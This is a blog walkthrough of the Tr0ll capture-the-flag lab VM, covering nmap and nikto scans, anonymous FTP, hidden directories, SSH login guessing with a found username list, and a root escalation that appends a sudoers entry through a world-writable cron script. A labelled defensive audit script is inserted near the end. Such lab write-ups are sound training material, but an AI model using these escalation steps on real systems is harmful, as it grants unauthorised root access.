Tuesday, February 7, 2017

Tr0ll

I heard about this VM on /r/netsecstudents (I forget which post). I figured I would give this one a shot, even if it's meant to be a bit more difficult than the three Kioptrix VMs I've written about so far.

Right off the bat I ran an nmap scan and a nikto scan. Nmap showed a few open ports.

root@kali:~# nmap -T4 -A -v 192.168.0.129

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-02-07 20:09 EST
NSE: Loaded 140 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Initiating ARP Ping Scan at 20:09
Scanning 192.168.0.129 [1 port]
Completed ARP Ping Scan at 20:09, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:09
Completed Parallel DNS resolution of 1 host. at 20:09, 0.06s elapsed
Initiating SYN Stealth Scan at 20:09
Scanning 192.168.0.129 [1000 ports]
Discovered open port 21/tcp on 192.168.0.129
Discovered open port 22/tcp on 192.168.0.129
Discovered open port 80/tcp on 192.168.0.129
Completed SYN Stealth Scan at 20:09, 0.05s elapsed (1000 total ports)
Initiating Service scan at 20:09
Scanning 3 services on 192.168.0.129
Completed Service scan at 20:09, 6.03s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.129
NSE: Script scanning 192.168.0.129.
Initiating NSE at 20:09
Completed NSE at 20:09, 0.23s elapsed
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Nmap scan report for 192.168.0.129
Host is up (0.00020s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap [NSE: writeable]
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_  256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:5B:3D:FD (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.001 days (since Tue Feb  7 20:08:02 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.20 ms 192.168.0.129

NSE: Script Post-scanning.
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds
           Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.290KB)



At this point I checked out what a web browser could show:
The page source didn't show much:
<html>
<img src=hacker.jpg>
</html>

This is where the nikto scan came in handy.
root@kali:~# nikto -h 192.168.0.129
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.129
+ Target Hostname:    192.168.0.129
+ Target Port:        80
+ Start Time:         2017-02-07 20:11:48 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x24 0x500438fe37ded
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/secret/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7536 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2017-02-07 20:12:03 (GMT-5) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~#


Checking out 192.168.0.129/secret (the entry pointed out in robots.txt) got another meme:


<html>
<img src="troll.jpg">
</html>

/icons/README contained (among other things):

Suggested Uses

The following are a few suggestions, to serve as a starting point for ideas.
Please feel free to tweak and rename the icons as you like.

     a.gif
          This might be used to represent PostScript or text layout
          languages.

     alert.black.gif, alert.red.gif
          These can be used to highlight any important items, such as a
          README file in a directory.

     back.gif, forward.gif
          These can be used as links to go to previous and next areas.

     ball.gray.gif, ball.red.gif
          These might be used as bullets.


Going back to the nmap scan, I decided to check out the FTP port by browsing to ftp://192.168.0.129/



This pcap file shows the FTP transfer of secret_stuff.txt. At first I was reading too much into this, thinking I should try to extract the .txt file. I did come across a great blog post showing how to do this, though:
https://shankaraman.wordpress.com/tag/how-to-extract-ftp-files-from-wireshark-packet/


"FTP Data Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P\n\nSucks, you were so close... gotta TRY HARDER!\n)"



sup3rs3cr3tdirlol - a secret directory, huh. Might as well try to find it. Second try and I got it:

192.168.0.129/sup3rs3cr3tdirlol (first try I tried sup3rs3cr3t)


 Another file to decipher...... more trolling. After downloading the file I found out it was an ELF binary.
 

I spent a good amount of time looking up how to edit/view a binary, even spending a decent amount of time in edb. I was looking for a clue, a troll or something at the memory address "0x0856BF".
http://i2.kym-cdn.com/entries/icons/facebook/000/006/725/desk_flip.jpg


 As an act of pure luck I decided to try "0x0856BF" as part of a web address.




 good_luck/ contained a text file called "which_one_lol.txt":
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
While this_folder_contains_the_password/ contained a text file called "Pass.txt":
Good_job_:)

The folder says the password is in the folder, so I guess the password is "Pass.txt" (not Good_job_:)).
At first I thought it was genphlux with "Pass.txt" as the password.
After many more guesses I got in with the username overflow.

After a good bit of looking around I found another clue.... maybe even a troll:
Before going further I was kicked out (2nd time it happened).

cleaner.py is a Python script that performs "rm -r /tmp/*". The cool thing is this file has rwx permissions for all users. If the file is edited to grant the user overflow root permissions then we're set. The catch is that the script needs to run as root to edit the sudoers file, which is a waiting game since the script is already in the crontab.

import os
import sys

# Added to cleaner.py: when cron runs it as root, overflow gets a sudoers entry
try:
    os.system('echo overflow        ALL=(ALL) ALL >> /etc/sudoers ')
except:
    sys.exit()


and we have root!
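The weakness here is a root cron job running a script anyone can modify. As an added example (not from this write-up), a small Python audit that parses crontab lines and flags jobs whose script is writable by group or others; the crontab text and file paths in demo() are constructed for the demonstration.

```python
# Added example: audit crontab entries for scripts writable by non-owners.
import os
import stat
import tempfile

CRON_FIELDS = 5  # minute hour day-of-month month day-of-week


def script_paths_from_cron_line(line):
    """Return every absolute-path token in the command part of a cron line."""
    line = line.strip()
    # Skip blanks, comments and environment assignments such as PATH=...
    if not line or line.startswith("#") or "=" in line.split()[0]:
        return []
    if line.startswith("@"):          # @reboot, @hourly, ... have no schedule fields
        tokens = line.split()[1:]
    else:
        tokens = line.split()[CRON_FIELDS:]
    return [tok for tok in tokens if tok.startswith("/")]


def is_writable_by_others(path):
    """True if the file grants write to group or other (the cleaner.py case)."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def find_risky_cron_jobs(crontab_text):
    """Return (cron line, path) pairs where a referenced path is writable by others."""
    risky = []
    for line in crontab_text.splitlines():
        for path in script_paths_from_cron_line(line):
            if is_writable_by_others(path):
                risky.append((line.strip(), path))
    return risky


def demo():
    # Constructed sample: a mode-777 cleaner.py beside a root-only backup script.
    d = tempfile.mkdtemp()
    bad, good = os.path.join(d, "cleaner.py"), os.path.join(d, "backup.sh")
    for p in (bad, good):
        open(p, "w").close()
    os.chmod(bad, 0o777)
    os.chmod(good, 0o700)
    crontab = "* * * * * python %s\n0 2 * * * %s\n# comment\n" % (bad, good)
    return [p for _, p in find_risky_cron_jobs(crontab)] == [bad]
```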
-----------------------------------------------------------------------------------------------------------------------------
 While searching around I also got the OS version:
cat /proc/version
Linux version 3.13.0-32-generic (buildd@roseapple) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 



 There are a few privilege escalation exploits for kernel version 3.13. Might as well try them as well. Like I've done before, I copy the exploit over to /var/www and get Apache running; this way I can get a copy of it onto the Tr0ll box. I ended up trying four of these before I found one that worked.

There you go. Two ways to get root on this box..... Once you've fought your way past all the Trolling!



